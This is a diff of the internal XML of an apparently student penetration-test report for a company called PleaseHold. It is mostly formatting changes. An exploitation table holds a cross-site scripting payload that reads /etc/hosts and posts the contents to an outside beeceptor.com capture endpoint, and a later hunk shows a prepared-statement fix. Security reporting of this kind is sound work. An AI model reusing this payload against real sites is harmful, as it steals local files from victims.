                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -16323,7 +14313,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="1735839" cy="450486"/>
+                            <a:ext cx="2694164" cy="699191"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -16374,8 +14364,8 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D8B95B" wp14:editId="0281254E">
-                  <wp:extent cx="1678189" cy="767443"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D8B95B" wp14:editId="32BC155C">
+                  <wp:extent cx="2557752" cy="1169670"/>
                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
                   <wp:docPr id="7" name="Picture 7"/>
                   <wp:cNvGraphicFramePr>
@@ -16397,7 +14387,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="1702664" cy="778635"/>
+                            <a:ext cx="2645640" cy="1209861"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -16452,7 +14442,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="54" w:name="_Exploitation_2"/>
-      <w:bookmarkStart w:id="55" w:name="_Toc71451236"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc71453350"/>
       <w:bookmarkEnd w:id="54"/>
       <w:r>
         <w:rPr>
@@ -16509,14 +14499,14 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="786"/>
-        <w:gridCol w:w="4657"/>
-        <w:gridCol w:w="3576"/>
+        <w:gridCol w:w="728"/>
+        <w:gridCol w:w="3935"/>
+        <w:gridCol w:w="4356"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="846" w:type="dxa"/>
+            <w:tcW w:w="786" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16548,7 +14538,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5166" w:type="dxa"/>
+            <w:tcW w:w="4029" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16580,7 +14570,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3007" w:type="dxa"/>
+            <w:tcW w:w="4204" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16614,7 +14604,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="846" w:type="dxa"/>
+            <w:tcW w:w="786" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16634,7 +14624,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5166" w:type="dxa"/>
+            <w:tcW w:w="4029" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16645,7 +14635,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
@@ -16662,9 +14651,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve">!-- </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16672,56 +14660,56 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
+              <w:t>xxs_2.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xxs_2.html --&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16729,20 +14717,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16750,19 +14736,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16770,7 +14755,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16789,21 +14774,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">    xhr2.send("test=" + this.responseText);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16811,7 +14793,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
+              <w:t xml:space="preserve">  };</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16830,20 +14812,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhr.open("GET", "/etc/hosts");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16851,178 +14831,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "/etc/hosts");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhr.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -17044,7 +14853,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3007" w:type="dxa"/>
+            <w:tcW w:w="4204" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17085,9 +14894,9 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="57F0A1CF">
-                  <wp:extent cx="2128157" cy="1101812"/>
-                  <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="26D730D6">
+                  <wp:extent cx="2623457" cy="1358244"/>
+                  <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                   <wp:docPr id="8" name="Picture 8"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -17108,7 +14917,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2128157" cy="1101812"/>
+                            <a:ext cx="2639658" cy="1366632"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -17146,7 +14955,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="56" w:name="_Section_3_–"/>
-      <w:bookmarkStart w:id="57" w:name="_Toc71451237"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc71453351"/>
       <w:bookmarkEnd w:id="56"/>
       <w:r>
         <w:rPr>
@@ -17260,12 +15069,13 @@
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="659"/>
-        <w:gridCol w:w="4683"/>
-        <w:gridCol w:w="3677"/>
+        <w:gridCol w:w="3872"/>
+        <w:gridCol w:w="4488"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -17302,7 +15112,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4581" w:type="dxa"/>
+            <w:tcW w:w="3872" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17334,7 +15144,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3779" w:type="dxa"/>
+            <w:tcW w:w="4488" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17388,7 +15198,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4581" w:type="dxa"/>
+            <w:tcW w:w="3872" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17456,7 +15266,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3779" w:type="dxa"/>
+            <w:tcW w:w="4488" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17499,19 +15309,19 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6F4B65" wp14:editId="08674FF3">
-                  <wp:extent cx="2366760" cy="371436"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="3" name="Picture 3"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BFA6951" wp14:editId="00A748C8">
+                  <wp:extent cx="2712720" cy="1213485"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+                  <wp:docPr id="14" name="Picture 14"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -17531,7 +15341,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2483796" cy="389803"/>
+                            <a:ext cx="2712720" cy="1213485"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -17576,7 +15386,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4581" w:type="dxa"/>
+            <w:tcW w:w="3872" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17670,7 +15480,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3779" w:type="dxa"/>
+            <w:tcW w:w="4488" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17705,15 +15515,13 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:noProof/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="296A971F" wp14:editId="5C387670">
-                  <wp:extent cx="2200506" cy="772090"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-                  <wp:docPr id="9" name="Picture 9"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E6A05C9" wp14:editId="346CB9AD">
+                  <wp:extent cx="2712720" cy="556895"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="15" name="Picture 15"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -17721,7 +15529,7 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="9" name="Picture 9"/>
+                          <pic:cNvPr id="1" name=""/>
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -17733,7 +15541,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2257757" cy="792178"/>
+                            <a:ext cx="2712720" cy="556895"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>

--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -72,13 +72,23 @@
           <w:szCs w:val="48"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t>PleaseHold Pty. Ltd.</w:t>
+        <w:t>PleaseHold</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -281,7 +291,15 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> at the request of PleaseHold Pty. Ltd.</w:t>
+        <w:t xml:space="preserve"> at the request of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PleaseHold</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -764,7 +782,21 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Since PleaseHold deals with banks and telecommunication companies who always put security at the first place, it is recommended to have HTTPS enabled to inspire trusts from business partners.</w:t>
+        <w:t xml:space="preserve"> Since </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>PleaseHold</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> deals with banks and telecommunication companies who always put security at the first place, it is recommended to have HTTPS enabled to inspire trusts from business partners.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3883,7 +3915,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3956,7 +3988,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4029,7 +4061,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4102,7 +4134,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4175,7 +4207,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4247,7 +4279,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4319,7 +4351,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4392,7 +4424,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4464,7 +4496,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4537,7 +4569,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4610,7 +4642,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4683,7 +4715,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6385,7 +6417,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = $con-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>prepare(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
